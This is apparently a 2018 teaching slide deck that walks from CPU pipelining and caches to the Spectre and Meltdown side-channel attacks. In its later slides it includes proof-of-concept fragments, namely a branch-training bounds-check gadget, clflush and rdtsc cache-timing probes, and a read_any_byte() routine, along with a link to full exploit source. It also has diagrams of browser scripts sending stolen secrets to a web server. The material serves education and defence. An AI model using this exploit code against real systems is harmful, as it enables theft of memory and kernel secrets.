Modern CPUs use various techniques to improve performance, such as instruction pipelining, cache memory, superscalar execution, out-of-order execution, speculative execution, and branch prediction. However, these optimizations can introduce security vulnerabilities such as the Spectre and Meltdown attacks, which exploit the side effects that speculative execution leaves in the CPU cache to leak secret data from memory. Speculative execution may process instructions before a branch is resolved, potentially loading secret-dependent data into the cache, where an attacker can detect it using precise timing measurements. While fixes have been developed, fully mitigating these issues remains an ongoing challenge for CPU architecture.
The Spectre of Meltdowns
1. Andriy Berestovskyy, 2018
[Title slide graphic: "networking hour" word cloud of networking terms (TCP, UDP, NAT, IPsec, IPv4, IPv6, ...); semihalf, berestovskyy]
2. The Spectre of Meltdowns
● Evolution of CPUs
● Spectre¹ Attack
● Security Holy Grail
● Meltdown³ Attack
● Fixes
● Spectre-Based Meltdown PoC
CPU?
3. Central Processing Unit (CPU): electronic circuitry that performs basic arithmetic, logical, control and input/output operations specified by the instructions. (Wikipedia)
Basic means simple, right?
4. Modern CPU Die
Source: Kaby Lake, https://newsroom.intel.com/press-kits/8th-gen-intel-core/
About 2 billion transistors
Why is it so complicated?
How does it work?
5. CPU Basic Operation Cycle*
Start
Fetch Instruction at PC
Decode Instruction
Load Data From Memory
Execute Instruction
Write Data to Memory
Update Registers and PC
* Instruction Cycle
Hardware implementation?
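The cycle above can be sketched in software as a small interpreter loop. This is only an illustration: the four-opcode instruction set, the `struct cpu` layout and the `run()` helper are invented for the sketch and do not model any real CPU.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical toy instruction set, invented for this sketch. */
enum opcode { OP_HALT, OP_LOAD, OP_ADD, OP_STORE };

struct instr {
    enum opcode op;
    uint8_t reg;   /* register operand */
    uint8_t addr;  /* memory operand */
};

struct cpu {
    size_t pc;        /* program counter */
    int32_t regs[4];  /* register file */
    int32_t mem[16];  /* data memory */
};

/* Runs until OP_HALT; returns the number of executed instructions. */
static size_t run(struct cpu *cpu, const struct instr *prog, size_t len)
{
    size_t executed = 0;

    while (cpu->pc < len) {
        /* Fetch instruction at PC. */
        struct instr in = prog[cpu->pc];

        /* Decode instruction. */
        assert(in.reg < 4 && in.addr < 16);
        if (in.op == OP_HALT)
            break;

        /* Load data from memory. */
        int32_t data = cpu->mem[in.addr];

        /* Execute instruction. */
        int32_t result = cpu->regs[in.reg];
        if (in.op == OP_LOAD)
            result = data;
        else if (in.op == OP_ADD)
            result += data;

        /* Write data to memory. */
        if (in.op == OP_STORE)
            cpu->mem[in.addr] = result;

        /* Update registers and PC. */
        cpu->regs[in.reg] = result;
        cpu->pc++;
        executed++;
    }
    return executed;
}
```

Every instruction here walks through all steps strictly one after another, which is the behaviour the following slides set out to speed up.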
7. Instructions Per Second (IPS): a measure of a computer's processor speed. (Wikipedia)
MIPS? FLOPS?
8. 4MHz CPU Performance
[Timing diagram: without pipelining each instruction takes four cycles (Fetch, Decode, Execute, Write): mov in cycles 1-4, xor in cycles 5-8, cmp starting at cycle 9.]
    mov len(%rip), %rdx
    xor %eax, %eax
    cmp %rdi, %rdx
    ...
4M cycles per second / 4 cycles per instruction = 1 MIPS
More performance! Solutions?
...one cycle per instruction?
9. Instruction pipelining: processing different parts of instructions in parallel, i.e. an attempt to keep every part of the CPU busy. (Wikipedia)
Let's do it!
11. Performance: Instruction Pipelining
[Pipeline diagram "Basic Pipeline", cycles 1-9: mov, xor, cmp and div overlap in the Fetch, Decode, Execute and Write stages.]
How many MIPS for a 4MHz CPU now?
12. 4MHz CPU with Pipeline
[Pipeline diagram, cycles 1-9: mov, xor and cmp overlap in the Fetch, Decode, Execute and Write stages.]
    mov len(%rip), %rdx
    xor %eax, %eax
    cmp %rdi, %rdx
    ...
4M cycles per second / 1 cycle per instruction = 4 MIPS
More performance!
...more MHz?
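Why pipelining moves the figure from 4 cycles per instruction towards 1 can be checked with a little arithmetic. The sketch below assumes an ideal pipeline with no stalls; the function names are made up for the illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Cycles to run n instructions one after another, `stages` cycles each. */
static uint64_t sequential_cycles(uint64_t n, uint64_t stages)
{
    return n * stages;
}

/* Ideal pipeline without stalls: the first instruction needs `stages`
 * cycles, every following instruction completes one cycle later. */
static uint64_t pipelined_cycles(uint64_t n, uint64_t stages)
{
    assert(stages > 0);
    return n == 0 ? 0 : stages + (n - 1);
}
```

For the three instructions on the slide and four stages this gives 12 cycles without the pipeline and 6 with it. For a long instruction stream the pipelined cost approaches one cycle per instruction, which is where the 4 MIPS at 4MHz comes from.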
13. 8MHz CPU with Pipeline
[Pipeline diagram, cycles 1-17: mov, xor and cmp overlap in the F, D, E, W stages.]
    mov len(%rip), %rdx
    xor %eax, %eax
    cmp %rdi, %rdx
    ...
8M cycles per second / 1 cycle per instruction = 8 MIPS
More performance?
14. 40MHz CPU Performance
[Pipeline diagram: mov, xor, cmp.]
    mov len(%rip), %rdx
    xor %eax, %eax
    cmp %rdi, %rdx
    ...
40M cycles per second / 1 cycle per instruction = 40 MIPS?
Really?
15. Clock Speed Does Not Scale
[Pipeline diagram: mov, xor, cmp.]
40M cycles per second / 1 cycle per instruction = 40 MIPS
Source: https://en.wikipedia.org/wiki/Megahertz_myth
Why?
17. Cache: faster memory, closer to a CPU, which stores copies of frequently used main memory locations. (Wikipedia)
Let's do it!
18. CPU with Pipeline and Cache
[Block diagram. Pipeline stages: Instruction Fetch, Decode/Load, Execute, Write. Blocks between the stages: Instruction Fetch/Decode, Instruction Decode/Execute, Instruction Execute/Write. Other components: PC, Registers, ALU, Memory, Instr. Cache, Data Cache, Write Buffer.]
* Intel i486 and newer
What's changed? Performance?
19. CPU with Pipeline and Cache
[Pipeline diagram: mov, xor, cmp, div, with stalls marked at a cache miss and at div. Stalls :(]
40M cycles per second / ~4 cycles per instruction = ~10 MIPS
...but pipeline sometimes stalls...
More performance! Solution?
20. Superscalar CPU: executes more than one instruction during a clock cycle using different execution units. (Wikipedia)
Let's do it!
21. Superscalar CPU Instruction Cycle
Start
Fetch Two Instructions
Decode Two Instructions
Load Order: D1, D2
Execute Two Instructions
Write Order: D1, D2
Update Order: D1, D2
* Intel Pentium and newer
Why order? Performance?
22. Superscalar CPU with Cache
[Pipeline diagram: mov, xor, cmp, div, with stalls marked at a cache miss, at div, and for read ordering and write ordering. Ordering :(]
40M CPS / ~4 CPI * 1.5 instructions per cycle = ~15 MIPS
...but stall due to ordering...
More performance! Solutions?
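The back-of-the-envelope figures used on the performance slides all follow one formula. The helper below is a sketch of that arithmetic only; the name `mips()` and its parameter names are assumptions made for the illustration, and `parallel_instr` stands for the "1.5 instructions per cycle" factor of the superscalar slide.

```c
#include <assert.h>

/* Millions of instructions per second for a given clock rate, average
 * cycles per instruction (CPI) and average number of instructions
 * executed in parallel (1.0 for a scalar CPU). */
static double mips(double clock_hz, double cpi, double parallel_instr)
{
    assert(clock_hz > 0.0 && cpi > 0.0 && parallel_instr > 0.0);
    return clock_hz / cpi * parallel_instr / 1e6;
}
```

With the numbers from the slides, `mips(4e6, 4, 1)` is the unpipelined 4MHz CPU, `mips(4e6, 1, 1)` the pipelined one, `mips(40e6, 4, 1)` the 40MHz CPU with stalls, and `mips(40e6, 4, 1.5)` the superscalar case.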
23. Out-of-Order (dynamic) Execution: the processor executes instructions in an order determined by the availability of input data and execution units, not by their original order in a program. (Wikipedia)
Let's do it!
24. Out of Order CPU
[Pipeline diagram: mov, xor, cmp, div, with a cache miss; read reordering :( and write reordering :( are marked.]
Re-order buffers on Intel CPUs
Improves average instructions per cycle ratio
* Intel Pentium Pro and newer
Why?
What about conditional jumps?
26. OoO CPU vs Conditional Jumps
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov array(%rdi), %eax
.L1:
    ret
[Pipeline diagram: xor; cmp waits on a cache miss; jbe depends on cmp; after jbe the PC points to either mov or ret. Stall?]
...but next instruction is unknown...
More performance! Solutions?
28. CPU with Speculative Execution
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov array(%rdi), %eax
.L1:
    ret
[Pipeline diagram: xor; cmp waits on a cache miss; jbe depends on cmp; mov* (with its own cache miss) and ret* are executed speculatively.]
Continue with mov!
What if speculation is incorrect?
29. Branch Miss
[Pipeline diagram: xor; cmp waits on a cache miss; jbe depends on cmp; mov* (cache miss) and ret* are executed speculatively; on a branch miss the PC is corrected and ret is fetched with an icache miss. The lost cycles are the branch miss penalty.]
Flush the pipeline!
...but branch misses are very expensive...
More performance! Options?
30. Speculation Options
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
[Branch diagram: after jbe one path continues with "ret ...", the other with "mov array(%rdi), %eax", then "ret ...".]
Options:
1. Execute left branch
2. Execute right branch
3. Execute both branches
4. Other?
Pros/cons? Solution?
31. Branch Predictor: a digital circuit that tries to guess which way a branch will go before this is known definitively. (Wikipedia)
How does it work?
32. Branch Predictor
[Diagram: for the instruction stream xor, cmp, jbe, mov, ret, the last n bits of the instruction address select one of the 2^n elements of the Branch History Table; each element holds recent Y/N (taken / not taken) outcomes, and the selected element yields the prediction.]
Source: https://en.wikipedia.org/wiki/Branch_predictor
Let's do it!
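A branch history table of this shape is small enough to sketch in a few lines. Note the substitution: the slide shows a short Y/N history per element, while the sketch below uses the common 2-bit saturating counter per element instead. The table size and all names are assumptions made for the illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define BHT_BITS 4                 /* n: index width (assumed value) */
#define BHT_SIZE (1u << BHT_BITS)  /* 2^n elements */

/* One 2-bit saturating counter per element:
 * 0 and 1 predict "not taken", 2 and 3 predict "taken". */
struct bht {
    uint8_t counter[BHT_SIZE];
};

/* The last n bits of the instruction address select the element. */
static unsigned bht_index(uint64_t instr_addr)
{
    return (unsigned)(instr_addr & (BHT_SIZE - 1));
}

static bool bht_predict(const struct bht *t, uint64_t instr_addr)
{
    assert(t);
    return t->counter[bht_index(instr_addr)] >= 2;
}

/* Called once the branch is resolved, to record the real outcome. */
static void bht_update(struct bht *t, uint64_t instr_addr, bool taken)
{
    assert(t);
    uint8_t *c = &t->counter[bht_index(instr_addr)];

    if (taken && *c < 3)
        (*c)++;
    else if (!taken && *c > 0)
        (*c)--;
}
```

Two properties of this sketch matter for the attack slides later in the deck: a few calls with the same outcome are enough to flip the prediction, and two branches whose addresses share the last n bits share one element.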
33. CPU with Branch Predictor
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov array(%rdi), %eax
.L1:
    ret
[Pipeline diagram: xor; cmp waits on a cache miss; jbe depends on cmp; prediction: do not take branch, so mov* (cache miss) and ret* are executed speculatively.]
...but there are no more ideas...
More performance! Solutions?
34. Multi-Core Processor: a CPU with two or more independent processing units called cores, which read and execute program instructions. (Wikipedia)
How many cores?
36. CPU Performance Summary
+ Instruction Pipelines
+ Memory Cache
+ Superscalar Execution
+ Out of Order Execution
+ Speculative Execution
+ Branch Prediction
+ Multiple Cores
± CPU Clock (to a certain extent)
Modern CPU Core?
37. Modern CPU Core
Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
[Block diagram. Front end: 32K L1 Instruct. Cache, Branch Prediction Unit, Legacy Decode Pipeline, MSROM, Decoded Icache, Instruction Decode Queue (micro-op queue). Then Allocate/Rename/Retire/Move Elimination/Zero Idiom and the Scheduler. Execution units on Port 0, Port 1, Port 5 and Port 6: ALU, SHFT, Fast LEA, Slow LEA, Slow Int, Vec ALU, Vec Shft, Vec Shuff, Vec Add, Vec Mul, FMA, DIV, Branch1, Branch2. Memory units on ports 2, 3, 4 and 7: LD/STA, LD/STA, STD, STA. Memory: 32K L1 Data Cache, 256K L2 Cache, L3.]
Modern CPU Die?
39. Because we need performance!
So, what about Spectre et al?
40. All Your Secrets Belong to Us ()
    #include <stddef.h>
    #include <stdint.h>

    uint8_t array[256 * 4096];
    size_t array_size = 256;

    uint8_t bounds_check(size_t idx)
    {
        if (idx < array_size)
            return array[idx * 4096];
        return 0;
    }

bounds_check:
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    sal $12, %rdi
    mov array(%rdi), %eax
.L1:
    ret
Full source: https://godbolt.org/g/Snb13E
Execution? Why?
41. Bounds Check on Modern CPU
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    sal $12, %rdi
    mov array(%rdi), %eax
[Pipeline diagram: xor; cmp waits on a cache miss; jbe depends on cmp; prediction: do not take branch, so sal* and mov* (cache miss) are executed speculatively.]
What about cache?
42. Memory Prior to Cache Misses
    cmp %rdi, array_size(%rip)
    jbe .L1
    sal $12, %rdi
    mov array(%rdi), %eax
[Virtual Memory diagram with the legend "cold" memory / cached memory, showing array_size, array and the offset array_size * 4096. Pipeline at the current cycle: cmp waits on a cache miss; jbe depends on cmp; prediction: do not take branch; sal* and mov* (cache miss) are speculative.]
What will happen after execution?
43. Memory After Cache Misses
    cmp %rdi, array_size(%rip)
    jbe .L1
    sal $12, %rdi
    mov array(%rdi), %eax
[Virtual Memory diagram with the legend "cold" memory / cached memory, showing array_size, array and the offset array_size * 4096. Pipeline at the current cycle: cmp (cache miss); jbe depends on cmp; prediction: do not take branch; sal* and mov* (cache miss) are speculative.]
What if we missed the branch?
44. Memory After Branch Miss
    sal $12, %rdi
    mov array(%rdi), %eax
.L1:
    ret
[Virtual Memory diagram with the legend "cold" memory / cached memory, showing array_size and array. Pipeline: cmp (cache miss); jbe depends on cmp; sal* and mov* (cache miss) were speculative; after the branch miss the PC moves to ret.]
Flush the pipeline!
Side effect!
How to detect cache side effect?
45. Observing Cache Side Effects
[Virtual Memory diagram with the legend "cold" memory / cached memory, showing array_size and array; one region is marked "Speculation side effect".]
    uint8_t array[256 * 4096];
    size_t array_size = 256;
    ...
    for (i = 0; i < 256; i++) {
        start = rdtscp();
        tmp = array[i * 4096];
        cycles = rdtscp() - start;
        ...
    }
* Simplification
How can we exploit these side effects?
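Once the 256 access times have been measured, the remaining step is to decide which slot, if any, was already cached. The sketch below shows one way to make that decision. The function name is made up, and the 2/3-of-average threshold is an assumption borrowed from the read_any_byte() code shown near the end of the deck, not a universal constant.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns the index of the slot whose access time is clearly below the
 * average of all slots, or -1 if no slot stands out.
 * cycles[i] is the measured access time of array[i * 4096]. */
static int find_cached_slot(const uint64_t *cycles, size_t n)
{
    uint64_t sum = 0;
    size_t i, best = 0;

    assert(cycles != NULL && n > 0);
    for (i = 0; i < n; i++) {
        sum += cycles[i];
        if (cycles[i] < cycles[best])
            best = i;
    }
    /* cycles[best] < average * 2 / 3, rearranged to avoid division. */
    if (cycles[best] * 3 * n < sum * 2)
        return (int)best;
    return -1;
}
```

In practice a single pass is noisy, so measurements are usually repeated and the per-slot minimum is kept before a decision like this is made.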
48. Bounds Check Pipeline
bounds_check(unsigned long):
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov base_array(%rdi), %eax
    sal $12, %eax
    mov side_effects(%rax), %eax
[Pipeline diagram: cmp waits for array_size; jbe depends on cmp; prediction: do not take branch, so mov*, sal* and mov* are executed speculatively.]
Data is precached
Speculative read from side_effects
Can we reach outside the array?
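Read back into C, the assembly above corresponds to a bounds check followed by two dependent loads. The version below is a reconstruction from that listing, not the author's source: the size of `base_array`, the `STRIDE` name and the exact types are assumptions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define STRIDE 4096  /* sal $12: one slot per possible byte value */

static uint8_t base_array[16];                  /* assumed size */
static size_t array_size = sizeof(base_array);
static uint8_t side_effects[256 * STRIDE];

uint8_t bounds_check(size_t idx)
{
    assert(array_size <= sizeof(base_array));
    if (idx < array_size) {
        /* mov base_array(%rdi), %eax */
        uint8_t value = base_array[idx];
        /* sal $12, %eax; mov side_effects(%rax), %eax */
        return side_effects[(size_t)value * STRIDE];
    }
    return 0;
}
```

Architecturally the function is correct: an out-of-range idx always returns 0. The concern raised on the slide is only about what the two loads may do speculatively before the comparison has been resolved.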
50. Putting All Together: Spectre¹
1. Call bounds_check() a few times with a valid index
2. Flush array_size from the cache to get a cache miss
3. Call bounds_check() with an index pointing to the secret
4. Use the secret as an index into side_effects
5. Observe the side_effects access time
Full source: https://github.com/berestovskyy/spectre-meltdown
Summary?
51. Spectre¹ Summary
1. Reason: cache side effects
2. The source code is valid, no (easy) fix in software
3. Cache side-channel might be fixed in the future
4. Reads any byte within current process memory
Is it even dangerous?
53. JavaScript Attack Scenario
[Sequence diagram between Web Browser and Web Server:]
1. GET /
2. OK index.html (the browser parses index.html)
3. GET /spectre.js
4. OK spectre.js (the browser executes spectre.js)
5. HTTP POST secrets.json
Execution?
56. Process isolation: hardware and software technologies designed to protect each process from other processes by disallowing inter-process memory access. (Wikipedia)
Hardware? In practice?
57. Virtual Memory: an abstraction of the resources that are actually available on a given machine. A combination of hardware and software maps Virtual Addresses into Physical Addresses. (Wikipedia)
How to map Virtual to Physical?
58. Translation Lookaside Buffer (TLB): stores recent translations of virtual memory to physical memory, i.e. an address-translation cache. Part of the CPU memory-management unit (MMU). (Wikipedia)
Drawings!
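The idea of an address-translation cache can be sketched as a small lookup table keyed by the virtual page number. Everything concrete below is an assumption made for the illustration: 4KB pages, 64 entries, a direct-mapped layout and the function names. Real TLBs are set-associative hardware structures.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define PAGE_BITS   12  /* 4KB pages */
#define TLB_ENTRIES 64  /* assumed size, direct-mapped for simplicity */

struct tlb_entry {
    bool valid;
    uint64_t vpn;  /* virtual page number */
    uint64_t pfn;  /* physical frame number */
};

struct tlb {
    struct tlb_entry entry[TLB_ENTRIES];
};

/* Remembers a translation, e.g. after a page-table walk. */
static void tlb_insert(struct tlb *t, uint64_t vaddr, uint64_t paddr)
{
    uint64_t vpn = vaddr >> PAGE_BITS;
    struct tlb_entry *e = &t->entry[vpn % TLB_ENTRIES];

    e->valid = true;
    e->vpn = vpn;
    e->pfn = paddr >> PAGE_BITS;
}

/* On a hit stores the physical address in *paddr and returns true.
 * On a miss returns false: the caller has to walk the page tables. */
static bool tlb_lookup(const struct tlb *t, uint64_t vaddr, uint64_t *paddr)
{
    uint64_t vpn = vaddr >> PAGE_BITS;
    const struct tlb_entry *e = &t->entry[vpn % TLB_ENTRIES];

    assert(paddr != 0);
    if (!e->valid || e->vpn != vpn)
        return false;
    *paddr = (e->pfn << PAGE_BITS) | (vaddr & ((1u << PAGE_BITS) - 1));
    return true;
}
```

Only the page number is translated; the low 12 bits of the address (the offset within the page) pass through unchanged.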
59. Process Isolation
[Diagram: the 64 bit virtual address spaces of Process 1 (main(), array), Process 2 (main()) and the Kernel (syscall(), data) are mapped onto Physical Memory and Swap.]
Mapped by OS, translated using TLB.
Why?
How to communicate?
60. System Call: a programmatic way to request a service from the kernel. A syscall is a privilege level switch, not a process context switch, i.e. a syscall is processed in the user process context. (Wikipedia)
Why no process context switch?
61. Skylake TLB Cache Hierarchy
Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
Level             Page Size               Entries
Instruction       4KB                     128
First Level Data  4KB                     64
Instruction       2MB/4MB                 8 per thread
First Level Data  2MB/4MB                 32
First Level Data  1GB                     4
Second Level      Shared 4KB and 2/4MB    1536
Second Level      1GB                     16
Not that much :(
So, if no process context switch...
...how to access kernel data?
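62. Kernel Mapping
[Diagram: the virtual address spaces of Process 1 (main(), array1) and Process 2 (main()) each also contain the Kernel (syscall(), data) above the "Start Kernel Map" address; everything is backed by Physical Memory and Swap. SYSCALL: data access.]
Great!
Now, how to protect kernel data?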
63. CPU Privilege Level: per-process operating mode restrictions on the type and scope of operations that can be performed, i.e. the OS runs with more privileges than application software. (Wikipedia)
64. Privilege Level Switch
[Diagram: one 64 bit virtual address space containing Process (main(), array1) and, above the "Start Kernel Map" address, Kernel (syscall(), data), separated by a privilege level switch (SYSCALL).]
kernel is able to access process data
process is not able to access kernel data
Mega!
So, what is Meltdown?
65. Meltdown: a hardware vulnerability which allows a rogue process to read all memory, even when it is not authorized to do so. (Wikipedia)
Kernel is mapped to each process...
66. Meltdown
[Diagram: one 64 bit virtual address space containing Process (main(), array1) and, above the "Start Kernel Map" address, Kernel (syscall(), data).]
kernel is able to access process data
process is able to read kernel data
Meltdown :(
Let's do it!
69. Putting All Together: Meltdown³
1. Find the address of a kernel structure (out of scope)
2. Invoke a system call to cache this structure
3. Do Spectre¹, but with a kernel address:
a. Call bounds_check() a few times with a valid index
b. Flush array_size from the cache to get a cache miss
c. Call bounds_check() with an index pointing to the kernel structure
d. Use the secret as an index into side_effects
e. Observe the side_effects access time
Full source: https://github.com/berestovskyy/spectre-meltdown
Summary?
70. Meltdown³ Summary
1. Reason 0: hardware bug, accessing memory and checking privileges in parallel
2. Reason 1: cache side effects (i.e. Spectre)
3. Reason 2: kernel mapped into every process to make a syscall a privilege level switch, not a process context switch
4. Reads any mapped and cached byte
Is it even dangerous?
71. Meltdown Attack Scenario
[Sequence diagram between Web Browser and Web Server:]
1. GET /
2. OK index.html (the browser parses index.html)
3. GET /meltdown.js
4. OK meltdown.js (the browser executes meltdown.js with valid syscalls)
5. HTTP POST kernel-data.json
How to fix?
72. Fixes: An Open Question
Spectre¹:
1. Speculation barrier
2. Other?
Meltdown³:
1. Process context switch instead of privilege level switch
2. PCID/ASID
3. Other?
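As an illustration of the first Spectre¹ item, a speculation barrier can be placed between the bounds check and the dependent load. The sketch below assumes GCC or Clang on x86-64, where `_mm_lfence()` from `<emmintrin.h>` emits LFENCE. The `speculation_barrier()` macro and the function name are made up here, and the fallback branch is only a placeholder so the example compiles elsewhere.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#if defined(__x86_64__)
#include <emmintrin.h>  /* _mm_lfence() */
#define speculation_barrier() _mm_lfence()
#else
/* Placeholder for other targets: a compiler barrier only, NOT a CPU
 * speculation barrier. A real port needs the architecture's own one. */
#define speculation_barrier() __asm__ __volatile__("" ::: "memory")
#endif

static uint8_t array[256 * 4096];
static size_t array_size = 256;

uint8_t bounds_check_fenced(size_t idx)
{
    assert(array_size * 4096 <= sizeof(array));
    if (idx < array_size) {
        /* Later instructions do not start until the comparison above
         * has completed, so the load cannot run ahead of the check. */
        speculation_barrier();
        return array[idx * 4096];
    }
    return 0;
}
```

The price is performance: the barrier gives up, for this branch, the speculation that the earlier slides introduced to keep the pipeline busy.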
74. Read Any Byte()
    uint8_t read_any_byte(uint64_t addr)
    {
        size_t tries, i, sum = 0, cnt = 0, mins[BYTE_VALUES];

        /* Make addr relative to base_array, so it can be used as an index. */
        addr -= (uint64_t)&base_array;
        for (i = 0; i < BYTE_VALUES; i++)
            mins[i] = SIZE_MAX;
        for (tries = 0; tries < MIN_READS * 5; tries++) {
            char buf[PAGE_SIZE];

            /* A system call: read from fd (/proc/version, per the error message). */
            if (fd > 0 && pread(fd, &buf, sizeof(buf), 0) < 0)
                perror("Error reading /proc/version");
            ...
        }
        return 0;
    }
Further fragments shown on the same slide:
    /* Flush array_size before each call. Every BRANCH_TRAINS-th call passes
     * addr itself; the other calls mask it down to a small training index. */
    for (i = 1; i <= BRANCH_TRAINS * 4; i++) {
        _mm_clflush(&array_size);
        sched_yield();
        tmp = bounds_check(addr & (i % BRANCH_TRAINS - 1));
    }

    /* Time one read per side_effects page, then flush that page again. */
    for (i = 1; i < BYTE_VALUES; i++) {
        __sync_synchronize();
        register uint64_t start_tsc = __rdtsc();
        tmp = side_effects[i * PAGE_SIZE];
        __sync_synchronize();
        register uint64_t cycles = __rdtsc() - start_tsc;
        _mm_clflush(&side_effects[i * PAGE_SIZE]);
        if (cycles > MAX_READ_CYCLES)
            break;
        else if (cycles < mins[i])
            mins[i] = cycles;
        /* A page read much faster than the running average was cached. */
        if (cnt > MIN_READS && mins[i] < sum / cnt * 2 / 3)
            return i;
        sum += cycles;
        cnt++;
    }
Meltdown
Full source: https://github.com/berestovskyy/spectre-meltdown
75. References
1. Meltdown and Spectre
https://meltdownattack.com/
2. Spectre Attacks: Exploiting Speculative Execution by Paul Kocher et al
https://spectreattack.com/spectre.pdf
3. Meltdown by Moritz Lipp et al
https://meltdownattack.com/meltdown.pdf
4. ARM Developer. Vulnerability of Speculative Processors to Cache Timing Side-Channel Mechanism
https://developer.arm.com/support/security-update
5. Intel Software Developer Manuals
https://software.intel.com/en-us/articles/intel-sdm
6. Spectre-based Meltdown proof of concept in just 99 lines of code:
https://github.com/berestovskyy/spectre-meltdown